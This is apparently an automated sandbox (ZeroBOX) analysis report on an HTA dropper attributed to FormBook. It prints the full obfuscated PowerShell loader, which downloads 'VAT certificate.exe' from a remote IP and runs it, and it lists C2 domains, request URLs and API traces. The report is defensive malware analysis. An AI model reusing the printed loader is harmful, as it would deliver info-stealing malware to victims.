Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 9, 2024, 9:10 a.m.	June 9, 2024, 9:12 a.m.

Size	10.6KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`21164aaeeaaa2a4a6e77798aa82d5c7c`
SHA256	`412fa4b7e3501663a221ed568464de11f33c95b760fb49d8ae3792862cd2d4e6`
CRC32	`FC30EB9F`
ssdeep	`192:8YUpZR3j34A3rAy34dqAjXrfP/AjkV2kVNYIL3DY7gXqYRid:c1z4OhJAbNv+`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\wow123.hta
1932
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tGIue($EpIxmuGVuZLbfA, $aTGikfPRsZRV){[IO.File]::WriteAllBytes($EpIxmuGVuZLbfA, $aTGikfPRsZRV)};function bXhQxPG($EpIxmuGVuZLbfA){if($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67043,67051,67051))) -eq $True){rundll32.exe $EpIxmuGVuZLbfA }elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67055,67058,66992))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EpIxmuGVuZLbfA}elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67052,67058,67048))) -eq $True){misexec /qn /i $EpIxmuGVuZLbfA}else{Start-Process $EpIxmuGVuZLbfA}};function EZaqwmkrpm($YYPOnwifQTinecw){$UnrKhxCyrLrSiUjqf = New-Object (sJQmIfmn @(67021,67044,67059,66989,67030,67044,67041,67010,67051,67048,67044,67053,67059));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aTGikfPRsZRV = $UnrKhxCyrLrSiUjqf.DownloadData($YYPOnwifQTinecw);return $aTGikfPRsZRV};function sJQmIfmn($rdZrreW){$UDcOSFQvyucyt=66943;$hIpVaXCveA=$Null;foreach($LhcCvADFdJ in $rdZrreW){$hIpVaXCveA+=[char]($LhcCvADFdJ-$UDcOSFQvyucyt)};return $hIpVaXCveA};function VpeUnfmvvUnskxx(){$joDRUbaqCRhqCUu = $env:AppData + '\';$ZYEuq = $joDRUbaqCRhqCUu + 'VAT%20certificate.exe'; if (Test-Path -Path $ZYEuq){bXhQxPG $ZYEuq;}Else{ $rqdhhzPQQqHkKt = EZaqwmkrpm (sJQmIfmn @(67047,67059,67059,67055,67001,66990,66990,66992,67000,66999,66989,66993,66994,66989,66993,66991,66992,66989,66999,67000,66990,67062,67040,67057,67052,66990,67029,67008,67027,66980,66993,66991,67042,67044,67057,67059,67048,67045,67048,67042,67040,67059,67044,66989,67044,67063,67044));tGIue $ZYEuq $rqdhhzPQQqHkKt;bXhQxPG $ZYEuq;};;;;}VpeUnfmvvUnskxx;
  2160
  - VAT%20certificate.exe "C:\Users\test22\AppData\Roaming\VAT%20certificate.exe"
    2316
netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
2576
- firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2908
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
www.antonio-vivaldi.mobi	A 46.30.213.191	46.30.213.191
www.goldenjade-travel.com	A 116.50.37.244	116.50.37.244
www.3xfootball.com	A 154.215.72.110	154.215.72.110
www.kasegitai.tokyo	A 202.172.28.202	202.172.28.202
www.magmadokum.com	CNAME natroredirect.natrocdn.com CNAME redirect.natrocdn.com A 85.159.66.93	85.159.66.93
www.liangyuen528.com
www.techchains.info	A 66.29.149.46	66.29.149.46
www.rssnewscast.com	A 91.195.240.94	91.195.240.94
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
116.50.37.244	Active	Moloch
154.215.72.110	Active	Moloch
164.124.101.2	Active	Moloch
198.23.201.89	Active	Moloch
202.172.28.202	Active	Moloch
45.33.6.223	Active	Moloch
46.30.213.191	Active	Moloch
66.29.149.46	Active	Moloch
85.159.66.93	Active	Moloch
91.195.240.94	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49181 -> 116.50.37.244:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 46.30.213.191:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49190 -> 91.195.240.94:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49164 -> 198.23.201.89:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 198.23.201.89:80 -> 192.168.56.103:49164	2014819	ET INFO Packed Executable Download	Misc activity
TCP 198.23.201.89:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 198.23.201.89:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 198.23.201.89:80 -> 192.168.56.103:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 154.215.72.110:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 202.172.28.202:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49187 -> 85.159.66.93:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 9, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 9, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 9, 2024, 9:10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 9, 2024, 9:10 a.m.			0	0

Command line console output was observed (24 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: At line:1 char:736 console_handle: 0x00000053	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: + function tGIue($EpIxmuGVuZLbfA, $aTGikfPRsZRV){[IO.File]::WriteAllBytes($EpIx console_handle: 0x0000005f	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: muGVuZLbfA, $aTGikfPRsZRV)};function bXhQxPG($EpIxmuGVuZLbfA){if($EpIxmuGVuZLbf console_handle: 0x0000006b	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: A.EndsWith((sJQmIfmn @(66989,67043,67051,67051))) -eq $True){rundll32.exe $EpIx console_handle: 0x00000077	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: muGVuZLbfA }elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67055,67058,66992 console_handle: 0x00000083	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: ))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EpIxmuGVuZLb console_handle: 0x0000008f	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: fA}elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67052,67058,67048))) -eq $ console_handle: 0x0000009b	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: True){misexec /qn /i $EpIxmuGVuZLbfA}else{Start-Process $EpIxmuGVuZLbfA}};funct console_handle: 0x000000a7	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: ion EZaqwmkrpm($YYPOnwifQTinecw){$UnrKhxCyrLrSiUjqf = New-Object (sJQmIfmn @(67 console_handle: 0x000000b3	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]:: console_handle: 0x000000cb	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: TLS12;$aTGikfPRsZRV = $UnrKhxCyrLrSiUjqf.DownloadData($YYPOnwifQTinecw);return console_handle: 0x000000d7	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: $aTGikfPRsZRV};function sJQmIfmn($rdZrreW){$UDcOSFQvyucyt=66943;$hIpVaXCveA=$Nu console_handle: 0x000000e3	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: ll;foreach($LhcCvADFdJ in $rdZrreW){$hIpVaXCveA+=[char]($LhcCvADFdJ-$UDcOSFQvyu console_handle: 0x000000ef	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: cyt)};return $hIpVaXCveA};function VpeUnfmvvUnskxx(){$joDRUbaqCRhqCUu = $env:Ap console_handle: 0x000000fb	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: pData + '\';$ZYEuq = $joDRUbaqCRhqCUu + 'VAT%20certificate.exe'; if (Test-Path console_handle: 0x00000107	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: -Path $ZYEuq){bXhQxPG $ZYEuq;}Else{ $rqdhhzPQQqHkKt = EZaqwmkrpm (sJQmIfmn @(67 console_handle: 0x00000113	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: ,67040,67059,67044,66989,67044,67063,67044));tGIue $ZYEuq $rqdhhzPQQqHkKt;bXhQx console_handle: 0x00000143	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: PG $ZYEuq;};;;;}VpeUnfmvvUnskxx; console_handle: 0x0000014f	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000015b	1	1
WriteConsoleW June 9, 2024, 9:10 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000167	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00615d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00615b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00615b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00615b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00615b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00615b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00615b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00616658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 9, 2024, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006166d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 9, 2024, 9:10 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://198.23.201.89/warm/VAT%20certificate.exe

Performs some HTTP requests (15 events)

request	GET http://198.23.201.89/warm/VAT%20certificate.exe
request	POST http://www.3xfootball.com/fo8o/
request	GET http://www.3xfootball.com/fo8o/?f5A0cwal=IhZyPQIGe6uK3zPwwQVGm4hCASyaX3xlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c9dx/PGjLGAfpOvJ7U3hUqpnKd0zHv/hQdGhX4G3JlCydyJ23yerjxn4r8=&meE1x=FbDXUZ
request	GET http://www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
request	POST http://www.kasegitai.tokyo/fo8o/
request	GET http://www.kasegitai.tokyo/fo8o/?f5A0cwal=0LNqIGaAWMhMIMLOr1FzuAu+QFTp+Isr9lFre+yu3/9GvRNYi1uHghhDsQ/pqDAQ+wkUrFUIurr7TLyDqzId9vCn3h40hICDSYZjejM1bTxHHnFMxARLyMCZMUhSp6GMEGHL0HI=&meE1x=FbDXUZ
request	POST http://www.goldenjade-travel.com/fo8o/
request	GET http://www.goldenjade-travel.com/fo8o/?f5A0cwal=LFKqyrcu7g1NCa8bIVnmntQ0zrEKrQSprIMLtaWgKJ9bBKQr4dsn0J7ZoYUgIJ+R6Sel8OhXEcHhC7LyM9bkgjIIu2U6i6kbe5asCJcEX28JEcHJIWfCjODnuc7OiogdzaMrHf8=&meE1x=FbDXUZ
request	POST http://www.antonio-vivaldi.mobi/fo8o/
request	GET http://www.antonio-vivaldi.mobi/fo8o/?f5A0cwal=PTl5gU/3CD/Xhg5KAVLGoeqWcilDUK5FTZuVmm6gfrwSjnBrSraU5xyBGUoA1k9xMbAGIU7PLJqf1PTsNd74L3d6+NgzbyGN2pTsiSyIeh1B8hC/nFfIu9UZrk9ku3J39HvVUu8=&meE1x=FbDXUZ
request	POST http://www.magmadokum.com/fo8o/
request	GET http://www.magmadokum.com/fo8o/?f5A0cwal=qL3nKp+YSjoaTomnND+fiETGbzpIgkHGMW8DXsDTZ4AADrD7Wpn1kxM1jYW2/C2WhyBblBh5NUSWrO5bZjyCcVkJYbxxq5QITB2h2xAyEikjbcoqZSmDOCeIE8A+B7hyBKIW8mw=&meE1x=FbDXUZ
request	POST http://www.rssnewscast.com/fo8o/
request	GET http://www.rssnewscast.com/fo8o/?f5A0cwal=x3jV/ECx7FuzXOI+6CNaISj98UIEn47HyCIVaqWvGMMqpfz0YC5wNp/pxM1zEFNKv4nPeGfT8/lZrDaJmccs4488pD+gaHK32CxgTEs5a2vdBlM4hQBa8nlaMF5vesFSU19kJNk=&meE1x=FbDXUZ
request	POST http://www.techchains.info/fo8o/

Sends data using the HTTP POST Method (7 events)

request	POST http://www.3xfootball.com/fo8o/
request	POST http://www.kasegitai.tokyo/fo8o/
request	POST http://www.goldenjade-travel.com/fo8o/
request	POST http://www.antonio-vivaldi.mobi/fo8o/
request	POST http://www.magmadokum.com/fo8o/
request	POST http://www.rssnewscast.com/fo8o/
request	POST http://www.techchains.info/fo8o/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 160 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
